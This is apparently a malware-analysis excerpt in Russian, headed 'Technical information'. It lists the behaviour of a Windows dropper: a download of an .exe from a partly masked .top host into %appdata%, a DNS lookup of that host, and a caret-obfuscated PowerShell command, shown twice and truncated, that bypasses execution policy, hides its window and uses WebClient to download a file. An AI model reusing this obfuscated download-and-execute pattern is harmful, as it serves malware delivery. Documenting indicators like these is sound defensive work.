Техническая информация
- http://my####shares.top/sharesexcels.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oWerSH^El^l^.eX^E^ -E^XecuTi^O^NPoLI^c^y bY^P^aS^s^ ^-^nOpROfi^lE^ -^Wi^NdOW^S^tY^LE^ H^IdDEN (neW-o^Bj^ect ^Sy^st^e^m.NEt^.^WE^bc^li^EnT^)^.^Do^WN^L^o^A^d^fiLE^('http://my...
- DNS ASK my####shares.top
- '<SYSTEM32>\cmd.exe' /c "P^oWerSH^El^l^.eX^E^ -E^XecuTi^O^NPoLI^c^y bY^P^aS^s^ ^-^nOpROfi^lE^ -^Wi^NdOW^S^tY^LE^ H^IdDEN (neW-o^Bj^ect ^Sy^st^e^m.NEt^.^WE^bc^li^EnT^)^.^Do^WN^L^o^A^d^fiLE^('http://my...' (со скрытым окном)